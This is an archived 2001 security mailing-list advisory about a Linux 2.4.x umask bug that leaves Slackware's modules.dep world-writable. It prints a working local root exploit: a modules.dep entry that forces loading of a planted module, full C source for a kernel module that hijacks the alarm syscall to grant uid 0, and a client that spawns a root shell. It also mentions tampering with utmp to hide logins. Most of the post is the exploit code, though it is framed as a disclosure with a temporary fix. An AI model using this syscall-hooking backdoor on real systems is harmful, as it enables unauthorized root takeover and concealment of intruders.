2.4.x/Slackware Init script vulnerability

From: joshat_private
Date: Mon Jul 16 2001 - 07:53:01 PDT

Next message: gregory duchemin: "Re: Messenger/Hotmail passwords at risk"

Previous message: Justin Nelson: "Re: Win2K/NTFS messes file creation time/date"
In reply to: zen-parseat_private: "Happy 3 month anniversary cfingerd remote bug!"
Next in thread: joshat_private: "Re: 2.4.x/Slackware Init script vulnerability"
Reply: Derek Martin: "Re: 2.4.x/Slackware Init script vulnerability"
Reply: twiz - Perla Enrico: "Re: 2.4.x/Slackware Init script vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I posted this to the linux kernel mailing last Friday, July 13th 2001:

Submitted by  : Josh (joshat_private), lockdown
                (lockdownat_private) on July 16th, 2001
Vulnerability : /lib/modules/2.4.5/modules.dep
Tested On     : Slackware 8.0. 2.4.5
Local         : Yes
Remote        : No
Temporary Fix : umask 022 at the top of all your startup scripts
Target        : root
Big thanks to : slider, lamagra, zen-parse
Greets to     : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,
                cryptix, s0ttle, xphantom, qtip, tirancy, Loki,
                falcon-networks.com.

	The 2.4.x kernels starting with 2.4.3 (i think) have, after
load, left a umask of 0000.  This forces any files created in the bootup
scripts, without the command `umask 022` issued to be world writeable.
In slackware, files include /var/run/utmp and /var/run/gpm.pid.  This same
vulnerability is responsible for creating /lib/modules/`uname -r`/modules.dep
world writeable.  With this file world writeable, all an intruder need do is
put something like the following in /lib/modules/`uname -r`/modules.dep
assuming the system's startup scripts modprobe lp:

/lib/modules/2.4.5/kernel/drivers/char/lp.o:  /tmp/alarm.o

/tmp/alarm.o:

where the alarm.o module is:

#include <linux/config.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/types.h>
#include <asm/segment.h>
#include <asm/unistd.h>
#include <linux/dirent.h>
#include <sys/syscall.h>
#include <sys/sysmacros.h>

#include <linux/sched.h>

#include <linux/errno.h>
#include <linux/fs.h>
#include <linux/kernel.h>

extern void* sys_call_table[];

unsigned int (*old_alarm) (unsigned int seconds);
unsigned int hacked_alarm (unsigned int seconds);

unsigned int hacked_alarm(unsigned int seconds)
{
           if(seconds == 454) {
                current->uid = 0;
                current->euid = 0;
                current->gid = 0;
                current->egid = 0;
                return 0;
            }
   return old_alarm(seconds);
}

int init_module(void) {
 old_alarm=sys_call_table[SYS_alarm];
 sys_call_table[SYS_alarm] = hacked_alarm;
 return 0;
}

void cleanup_module(void) {
   sys_call_table[SYS_alarm] = old_alarm;
}

make a client:
#include <stdio.h>
#include <unistd.h>

int main(void)
{
  alarm(454);
  execl("/bin/sh", "sh", NULL);
}

which will, when the module is loaded, execute a shell as root.


        And of course with /var/run/utmp writeable, users can delete or in
other ways manipulate their logins as they appear in
w/who/finger/getlogin(), etc.

Next message: gregory duchemin: "Re: Messenger/Hotmail passwords at risk"
Previous message: Justin Nelson: "Re: Win2K/NTFS messes file creation time/date"
In reply to: zen-parseat_private: "Happy 3 month anniversary cfingerd remote bug!"
Next in thread: joshat_private: "Re: 2.4.x/Slackware Init script vulnerability"
Reply: Derek Martin: "Re: 2.4.x/Slackware Init script vulnerability"
Reply: twiz - Perla Enrico: "Re: 2.4.x/Slackware Init script vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 16 2001 - 09:01:33 PDT